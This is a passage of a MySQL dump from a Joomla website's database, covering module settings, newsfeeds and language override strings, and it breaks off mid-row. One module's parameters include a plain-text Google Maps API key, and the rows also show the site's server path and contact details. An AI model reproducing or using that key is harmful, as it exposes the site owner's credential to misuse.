/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_messages_cfg` (
`user_id` int(10) unsigned NOT NULL DEFAULT 0,
`cfg_name` varchar(100) NOT NULL DEFAULT '',
`cfg_value` varchar(255) NOT NULL DEFAULT '',
UNIQUE KEY `idx_user_var_name` (`user_id`,`cfg_name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_messages_cfg`
--
LOCK TABLES `vzx9b_messages_cfg` WRITE;
/*!40000 ALTER TABLE `vzx9b_messages_cfg` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_messages_cfg` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_modules`
--
DROP TABLE IF EXISTS `vzx9b_modules`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_modules` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`asset_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'FK to the #__assets table.',
`title` varchar(100) NOT NULL DEFAULT '',
`note` varchar(255) NOT NULL DEFAULT '',
`content` text DEFAULT NULL,
`ordering` int(11) NOT NULL DEFAULT 0,
`position` varchar(50) NOT NULL DEFAULT '',
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`published` tinyint(1) NOT NULL DEFAULT 0,
`module` varchar(50) DEFAULT NULL,
`access` int(10) unsigned NOT NULL DEFAULT 0,
`showtitle` tinyint(3) unsigned NOT NULL DEFAULT 1,
`params` mediumtext NOT NULL,
`client_id` tinyint(4) NOT NULL DEFAULT 0,
`language` char(7) NOT NULL,
PRIMARY KEY (`id`),
KEY `published` (`published`,`access`),
KEY `newsfeeds` (`module`,`published`),
KEY `idx_language` (`language`)
) ENGINE=InnoDB AUTO_INCREMENT=119 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_modules`
--
LOCK TABLES `vzx9b_modules` WRITE;
/*!40000 ALTER TABLE `vzx9b_modules` DISABLE KEYS */;
INSERT INTO `vzx9b_modules` VALUES (2,0,'Login','','',1,'login',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_login',1,1,'',1,'*'),(3,0,'Popular Articles','','',3,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_popular',3,1,'{\"count\":\"5\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(4,0,'Recently Added Articles','','',4,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_latest',3,1,'{\"count\":\"5\",\"ordering\":\"c_dsc\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(8,0,'Toolbar','','',1,'toolbar',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_toolbar',3,1,'',1,'*'),(9,0,'Quick Icons','','',1,'icon',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_quickicon',3,1,'',1,'*'),(10,0,'Logged-in Users','','',2,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_logged',3,1,'{\"count\":\"5\",\"name\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(12,0,'Admin Menu','','',1,'menu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',3,1,'{\"layout\":\"\",\"moduleclass_sfx\":\"\",\"shownew\":\"1\",\"showhelp\":\"1\",\"cache\":\"0\"}',1,'*'),(13,0,'Admin Submenu','','',1,'submenu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_submenu',3,1,'',1,'*'),(14,0,'User Status','','',2,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_status',3,1,'',1,'*'),(15,0,'Title','','',1,'title',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_title',3,1,'',1,'*'),(17,185,'Breadcrumbs','','',1,'breadcrumb',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_breadcrumbs',1,1,'{\"showHere\":\"1\",\"showHome\":\"1\",\"homeText\":\"\",\"showLast\":\"1\",\"separator\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(35,186,'Search','','',1,'offcanvas',0,'0000-00-00 00:00:00','2017-06-05 09:04:41','0000-00-00 00:00:00',-2,'mod_search',1,1,'{\"label\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"0\",\"button_pos\":\"right\",\"imagebutton\":\"0\",\"button_text\":\"\",\"opensearch\":\"1\",\"opensearch_title\":\"\",\"set_itemid\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(79,0,'Multilanguage status','','',1,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_multilangstatus',3,1,'{\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(86,0,'Joomla Version','','',1,'footer',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_version',3,1,'{\"format\":\"short\",\"product\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(91,181,'SP Page Builder','','',0,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_sppagebuilder_icons',1,1,'',1,'*'),(92,182,'SP Page Builder Admin Menu','','',1,'menu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_sppagebuilder_admin_menu',1,1,'',1,'*'),(94,187,'About Helix','','<p>Ball tip biltong pork belly frankfurter shankle jerky leberkas pig kielbasa kay boudin alcatra short loin.</p>\r\n<p>Jowl salami leberkas turkey pork brisket meatball turducken flank bilto porke belly ball tip. pork belly frankf urtane bilto</p>',1,'bottom1',0,'0000-00-00 00:00:00','2017-06-05 09:04:41','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(95,188,'Latest News','','',1,'bottom2',0,'0000-00-00 00:00:00','2017-06-05 09:04:41','0000-00-00 00:00:00',-2,'mod_articles_latest',1,1,'{\"catid\":[\"\"],\"count\":\"3\",\"show_featured\":\"\",\"ordering\":\"c_dsc\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(99,203,'Latest News','','',2,'right',0,'0000-00-00 00:00:00','2017-06-05 09:04:41','0000-00-00 00:00:00',-2,'mod_articles_latest',1,1,'{\"catid\":[\"79\"],\"count\":\"6\",\"show_featured\":\"\",\"ordering\":\"c_dsc\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(100,204,'Search','','',1,'right',0,'0000-00-00 00:00:00','2017-06-05 09:04:41','0000-00-00 00:00:00',-2,'mod_search',1,1,'{\"label\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"0\",\"button_pos\":\"right\",\"imagebutton\":\"0\",\"button_text\":\"\",\"opensearch\":\"1\",\"opensearch_title\":\"\",\"set_itemid\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(102,206,'Search','','',1,'left',0,'0000-00-00 00:00:00','2017-06-05 09:04:41','0000-00-00 00:00:00',-2,'mod_search',1,1,'{\"label\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"0\",\"button_pos\":\"right\",\"imagebutton\":\"0\",\"button_text\":\"\",\"opensearch\":\"1\",\"opensearch_title\":\"\",\"set_itemid\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(103,207,'Latest News','','',2,'left',0,'0000-00-00 00:00:00','2017-06-05 09:04:41','0000-00-00 00:00:00',-2,'mod_articles_latest',1,1,'{\"catid\":[\"79\"],\"count\":\"6\",\"show_featured\":\"\",\"ordering\":\"c_dsc\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(105,209,'Off Canvas Menu','','',1,'offcanvas',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,0,'{\"menutype\":\"mainmenu\",\"base\":\"\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(108,212,'ImageRecycle Statistics','','',0,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_imagerecycle_stats',1,1,'',1,'*'),(109,218,'News Show Pro GK5','','',0,'',0,'0000-00-00 00:00:00','2017-06-05 09:04:41','0000-00-00 00:00:00',-2,'mod_news_pro_gk5',1,1,'',0,'*'),(110,220,'DJ-ImageSlider','','',1,'',0,'0000-00-00 00:00:00','2016-10-28 10:06:30','0000-00-00 00:00:00',1,'mod_djimageslider',1,0,'{\"slider_source\":\"1\",\"slider_type\":\"2\",\"theme\":\"_override\",\"link_image\":\"1\",\"image_folder\":\"images\\/sampledata\\/fruitshop\",\"link\":\"\",\"category\":\"85\",\"show_title\":\"0\",\"show_desc\":\"0\",\"show_readmore\":\"0\",\"readmore_text\":\"\",\"link_title\":\"0\",\"link_desc\":\"0\",\"limit_desc\":\"\",\"full_width\":\"1\",\"image_width\":\"1250\",\"image_height\":\"400\",\"fit_to\":\"1\",\"image_centering\":\"0\",\"visible_images\":\"1\",\"space_between_images\":\"0\",\"max_images\":\"5\",\"sort_by\":\"1\",\"css3\":\"1\",\"autoplay\":\"1\",\"show_buttons\":\"0\",\"show_arrows\":\"0\",\"show_custom_nav\":\"0\",\"wcag\":\"1\",\"desc_width\":\"\",\"desc_bottom\":\"0\",\"desc_horizontal\":\"0\",\"left_arrow\":\"\",\"right_arrow\":\"\",\"play_button\":\"\",\"pause_button\":\"\",\"arrows_top\":\"40\",\"arrows_horizontal\":\"10\",\"idx_style\":\"0\",\"effect\":\"Expo\",\"effect_type\":\"0\",\"duration\":\"\",\"delay\":\"\",\"preload\":\"800\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(111,224,'BreezingForms','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_breezingforms',1,0,'{\"ff_mod_name\":\"contactnew\",\"ff_mod_page\":\"1\",\"ff_mod_editable\":\"0\",\"ff_mod_editable_override\":\"0\",\"ff_mod_frame\":\"0\",\"ff_mod_border\":\"0\",\"ff_mod_align\":\"1\",\"ff_mod_left\":\"0\",\"ff_mod_top\":\"0\",\"ff_mod_parprv\":\"\",\"ff_mod_parpub\":\"\",\"moduleclass_sfx\":\"\",\"owncache\":\"0\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(112,225,'Authorised Financial Service Provider. FSP No: 44636 ','','<p class=\"FSP\">Authorised Financial Service Provider. FSP No: 44636</p>',1,'top1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(113,226,'Contact Top','','<p class=\"contacttop\">JHB: +27 (0)11 958 2445 | <a href=\"mailto:info@smithandsmith.co.za\">info@smithandsmith.co.za</a></p>',1,'top2',0,'0000-00-00 00:00:00','2017-01-13 15:32:48','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(114,227,'SP Page Builder','','',0,'',0,'0000-00-00 00:00:00','2017-06-05 09:04:41','0000-00-00 00:00:00',-2,'mod_sppagebuilder',1,1,'',0,'*'),(115,233,'Tsi Map','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_tsimap',1,0,'{\"Marker\":\"images\\/map-marker.png\",\"Zoom\":\"15\",\"Latitude\":\"-26.1305381\",\"Longitude\":\"27.9068913\",\"Height\":\"400px\",\"Width\":\"100%\",\"Style\":\"[{\\\"featureType\\\":\\\"landscape\\\",\\\"stylers\\\":[{\\\"saturation\\\":-100},{\\\"lightness\\\":65},{\\\"visibility\\\":\\\"on\\\"}]},{\\\"featureType\\\":\\\"poi\\\",\\\"stylers\\\":[{\\\"saturation\\\":-100},{\\\"lightness\\\":51},{\\\"visibility\\\":\\\"simplified\\\"}]},{\\\"featureType\\\":\\\"road.highway\\\",\\\"stylers\\\":[{\\\"saturation\\\":-100},{\\\"visibility\\\":\\\"simplified\\\"}]},{\\\"featureType\\\":\\\"road.arterial\\\",\\\"stylers\\\":[{\\\"saturation\\\":-100},{\\\"lightness\\\":30},{\\\"visibility\\\":\\\"on\\\"}]},{\\\"featureType\\\":\\\"road.local\\\",\\\"stylers\\\":[{\\\"saturation\\\":-100},{\\\"lightness\\\":40},{\\\"visibility\\\":\\\"on\\\"}]},{\\\"featureType\\\":\\\"transit\\\",\\\"stylers\\\":[{\\\"saturation\\\":-100},{\\\"visibility\\\":\\\"simplified\\\"}]},{\\\"featureType\\\":\\\"administrative.province\\\",\\\"stylers\\\":[{\\\"visibility\\\":\\\"off\\\"}]},{\\\"featureType\\\":\\\"water\\\",\\\"elementType\\\":\\\"labels\\\",\\\"stylers\\\":[{\\\"visibility\\\":\\\"on\\\"},{\\\"lightness\\\":-25},{\\\"saturation\\\":-100}]},{\\\"featureType\\\":\\\"water\\\",\\\"elementType\\\":\\\"geometry\\\",\\\"stylers\\\":[{\\\"hue\\\":\\\"#ffff00\\\"},{\\\"lightness\\\":-25},{\\\"saturation\\\":-97}]}]\",\"UseAPI\":\"1\",\"ApiKey\":\"AIzaSyDYW_74sjQbNj73TvvLzDh_QAWn-qMvqw4\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(116,239,'JSitemap module','','',0,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_jmap',1,1,'',0,'*'),(117,240,'JSitemap Quickicons','','',99,'icon',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_jmapquickicon',1,1,'',1,'*');
/*!40000 ALTER TABLE `vzx9b_modules` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_modules_menu`
--
DROP TABLE IF EXISTS `vzx9b_modules_menu`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_modules_menu` (
`moduleid` int(11) NOT NULL DEFAULT 0,
`menuid` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`moduleid`,`menuid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_modules_menu`
--
LOCK TABLES `vzx9b_modules_menu` WRITE;
/*!40000 ALTER TABLE `vzx9b_modules_menu` DISABLE KEYS */;
INSERT INTO `vzx9b_modules_menu` VALUES (1,101),(2,0),(3,0),(4,0),(6,0),(7,0),(8,0),(9,0),(10,0),(12,0),(13,0),(14,0),(15,0),(17,0),(20,0),(22,234),(22,238),(22,242),(22,243),(22,244),(22,296),(22,399),(22,400),(25,294),(26,-463),(26,-462),(26,-433),(26,-432),(26,-431),(26,-430),(26,-429),(26,-427),(26,-400),(26,-399),(26,-296),(26,-244),(26,-243),(26,-242),(26,-238),(26,-234),(32,309),(35,0),(45,303),(57,238),(57,427),(57,429),(57,430),(57,431),(57,432),(57,433),(57,462),(57,463),(79,0),(86,0),(87,238),(87,427),(87,429),(87,430),(87,431),(87,432),(87,433),(87,462),(87,463),(91,0),(92,0),(94,0),(95,0),(96,0),(97,0),(99,492),(100,492),(101,492),(102,493),(103,493),(104,493),(105,0),(108,0),(112,0),(113,0),(117,0);
/*!40000 ALTER TABLE `vzx9b_modules_menu` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_newsfeeds`
--
DROP TABLE IF EXISTS `vzx9b_newsfeeds`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_newsfeeds` (
`catid` int(11) NOT NULL DEFAULT 0,
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(100) NOT NULL DEFAULT '',
`alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
`link` varchar(2048) NOT NULL,
`published` tinyint(1) NOT NULL DEFAULT 0,
`numarticles` int(10) unsigned NOT NULL DEFAULT 1,
`cache_time` int(10) unsigned NOT NULL DEFAULT 3600,
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`ordering` int(11) NOT NULL DEFAULT 0,
`rtl` tinyint(4) NOT NULL DEFAULT 0,
`access` int(10) unsigned NOT NULL DEFAULT 0,
`language` char(7) NOT NULL DEFAULT '',
`params` mediumtext NOT NULL,
`created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by` int(10) unsigned NOT NULL DEFAULT 0,
`created_by_alias` varchar(255) NOT NULL DEFAULT '',
`modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` int(10) unsigned NOT NULL DEFAULT 0,
`metakey` mediumtext NOT NULL,
`metadesc` mediumtext NOT NULL,
`metadata` mediumtext NOT NULL,
`xreference` varchar(50) NOT NULL DEFAULT '',
`publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`description` mediumtext NOT NULL,
`version` int(10) unsigned NOT NULL DEFAULT 1,
`hits` int(10) unsigned NOT NULL DEFAULT 0,
`images` mediumtext NOT NULL,
PRIMARY KEY (`id`),
KEY `idx_access` (`access`),
KEY `idx_checkout` (`checked_out`),
KEY `idx_state` (`published`),
KEY `idx_catid` (`catid`),
KEY `idx_createdby` (`created_by`),
KEY `idx_language` (`language`),
KEY `idx_xreference` (`xreference`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_newsfeeds`
--
LOCK TABLES `vzx9b_newsfeeds` WRITE;
/*!40000 ALTER TABLE `vzx9b_newsfeeds` DISABLE KEYS */;
INSERT INTO `vzx9b_newsfeeds` VALUES (17,1,'Joomla! Announcements','joomla-announcements','http://feeds.joomla.org/JoomlaAnnouncements',1,5,3600,0,'0000-00-00 00:00:00',1,1,1,'en-GB','{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"newsfeed_layout\":\"\",\"feed_display_order\":\"\"}','2011-01-01 00:00:01',309,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}','','0000-00-00 00:00:00','0000-00-00 00:00:00','',1,1,''),(17,2,'New Joomla! Extensions','new-joomla-extensions','http://feeds.joomla.org/JoomlaExtensions',1,5,3600,0,'0000-00-00 00:00:00',4,1,1,'en-GB','{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"newsfeed_layout\":\"\",\"feed_display_order\":\"\"}','2011-01-01 00:00:01',309,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}','','0000-00-00 00:00:00','0000-00-00 00:00:00','',1,0,''),(17,3,'Joomla! Security News','joomla-security-news','http://feeds.joomla.org/JoomlaSecurityNews',1,5,3600,0,'0000-00-00 00:00:00',2,1,1,'en-GB','{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"newsfeed_layout\":\"\",\"feed_display_order\":\"\"}','2011-01-01 00:00:01',309,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}','','0000-00-00 00:00:00','0000-00-00 00:00:00','',1,0,''),(17,4,'Joomla! Connect','joomla-connect','http://feeds.joomla.org/JoomlaConnect',1,5,3600,0,'0000-00-00 00:00:00',3,1,1,'en-GB','{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"newsfeed_layout\":\"\",\"feed_display_order\":\"\"}','2011-01-01 00:00:01',309,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}','','0000-00-00 00:00:00','0000-00-00 00:00:00','',1,2,'');
/*!40000 ALTER TABLE `vzx9b_newsfeeds` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_oneclickaction_actions`
--
DROP TABLE IF EXISTS `vzx9b_oneclickaction_actions`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_oneclickaction_actions` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`userid` bigint(20) unsigned NOT NULL,
`actionurl` varchar(4000) NOT NULL,
`otp` char(64) NOT NULL,
`expiry` datetime NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_oneclickaction_actions`
--
LOCK TABLES `vzx9b_oneclickaction_actions` WRITE;
/*!40000 ALTER TABLE `vzx9b_oneclickaction_actions` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_oneclickaction_actions` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_overrider`
--
DROP TABLE IF EXISTS `vzx9b_overrider`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_overrider` (
`id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
`constant` varchar(255) NOT NULL,
`string` mediumtext NOT NULL,
`file` varchar(255) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5202 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_overrider`
--
LOCK TABLES `vzx9b_overrider` WRITE;
/*!40000 ALTER TABLE `vzx9b_overrider` DISABLE KEYS */;
INSERT INTO `vzx9b_overrider` VALUES (1,'COM_ADMINTOOLS_ERROR_INVALID_KEY','Access denied','/home/smthsmth/public_html/language/en-GB/en-GB.com_admintools.ini'),(2,'COM_ADMINTOOLS_ERROR_NOT_ENABLED','Operation not permitted','/home/smthsmth/public_html/language/en-GB/en-GB.com_admintools.ini'),(3,'COM_ADMINTOOLS_FRONTENT_DUMMY_STRING','-','/home/smthsmth/public_html/language/en-GB/en-GB.com_admintools.ini'),(4,'COM_AJAX','Ajax Interface','/home/smthsmth/public_html/language/en-GB/en-GB.com_ajax.ini'),(5,'COM_AJAX_XML_DESCRIPTION','An extendable Ajax interface for Joomla.','/home/smthsmth/public_html/language/en-GB/en-GB.com_ajax.ini'),(6,'COM_AJAX_SPECIFY_FORMAT','Please specify a valid response format, other than that of HTML, such as json, raw, debug, etc.','/home/smthsmth/public_html/language/en-GB/en-GB.com_ajax.ini'),(7,'COM_AJAX_METHOD_NOT_EXISTS','Method %s does not exist.','/home/smthsmth/public_html/language/en-GB/en-GB.com_ajax.ini'),(8,'COM_AJAX_FILE_NOT_EXISTS','The file at %s does not exist.','/home/smthsmth/public_html/language/en-GB/en-GB.com_ajax.ini'),(9,'COM_AJAX_MODULE_NOT_ACCESSIBLE','Module %s is not published, you do not have access to it, or it\'s not assigned to the current menu item.','/home/smthsmth/public_html/language/en-GB/en-GB.com_ajax.ini'),(10,'COM_AJAX_TEMPLATE_NOT_ACCESSIBLE','Template %s is not assigned to the current menu item.','/home/smthsmth/public_html/language/en-GB/en-GB.com_ajax.ini'),(11,'COM_AKEEBA_COMMON_EMAIL_BODY_INFO','The new backup was taken with profile #%s. It consists of %s part(s). The full list of files of this backup set is the following:','/home/smthsmth/public_html/language/en-GB/en-GB.com_akeeba.ini'),(12,'COM_AKEEBA_COMMON_EMAIL_BODY_OK','Akeeba Backup has completed backing up your site using the front-end backup feature. You may visit the site\'s administrator section to download the backup.','/home/smthsmth/public_html/language/en-GB/en-GB.com_akeeba.ini'),(13,'COM_AKEEBA_COMMON_EMAIL_SUBJECT_OK','Akeeba Backup has taken a new backup','/home/smthsmth/public_html/language/en-GB/en-GB.com_akeeba.ini'),(14,'COM_AKEEBA_COMMON_ERR_NOT_ENABLED','Operation not permitted','/home/smthsmth/public_html/language/en-GB/en-GB.com_akeeba.ini'),(15,'COM_AKEEBA_EMAIL_POSTPROCESSING_FAILED','Post-processing (upload to remote storage) has 